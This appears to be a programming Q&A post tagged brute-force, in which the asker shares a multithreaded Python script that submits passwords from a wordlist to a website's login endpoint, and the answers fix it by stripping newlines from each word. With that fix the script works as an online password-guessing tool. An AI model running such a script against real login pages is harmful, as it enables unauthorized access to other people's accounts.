# Why is the argument not woking?

Tags: python, multithreading, brute-force

Argument works when it's passed as a string directly but not when it's passed as a variable.

I tested the code without threading, and I tested the code directly with the right password as a string and not a variable and it works. I checked at all levels that the the argument is still in the right type (string) but in the request it won't work, the login is not working.

```py
import requests
   import threading

   def checkfor(word):
       # word is passed as the password.
       payload = {'email':'my_email_here','password': word,'action':'login'}
       r = requests.post('https://_a_website_here_.org/rpc.php', data=payload)
       lookfor = "userkey"
       page_content = r.content
       if lookfor.encode() in page_content:
           print('[***>>>>>>>] your password is {}.[<<<****]'.format('-'))
       else:
           print('{}'.format('-'))

   threads = []
   pw_list = open('pw_list.txt', 'r') # passwords list
   pw_line = pw_list.readlines()
   pw_linex = pw_line[0:2] # for testing just get 2 first and it has the password set on 2nd place.

   for i in range(len(pw_linex)):
       word = str(pw_line[i])
       print(word)
       t = threading.Thread(target=checkfor, args=[word]) #if I insert the password as a string here it works.
       t.start()
       threads.append(t)

   for thread in threads:
       thread.join()
```

the password is in the list and it should login and tell me the password found. But it fails to do so somehow. Could someone bring light on this code to me please ? THx!

Comment: instead of `for i in range(len(pw_linex)):` and `word = str(pw_line[i])` you can do `for word in pw_linex:`

Comment: check if `print( word == "your password" )`. Reading lines from file you get text with `"\n"` at the end which you may not see but word with `"\n"` is not correct password - you have to `strip()` it - i.e. common method `word = word.strip()`

Comment: The argument being word?

Or the argument being the payload? @Lily H.

Comment: thanks @furas ! Indeed, i tried the strip() before but probably did something wrong there! Good day !

Answer (score 1, accepted):

Reading text from file you get lines with `"\n"` at the end of every line - and you have to remove it (strip it) to get correct word. To check if you don't have `"\n"` or spaces (which you may not see) you can print `">word<"`

```
#for word in pw_line[:2]: 
for word in pw_linex:
    word = word.strip()
    print(">{}<".format(word)) # older python
    #print(f">{word}<") # python 3.6+
```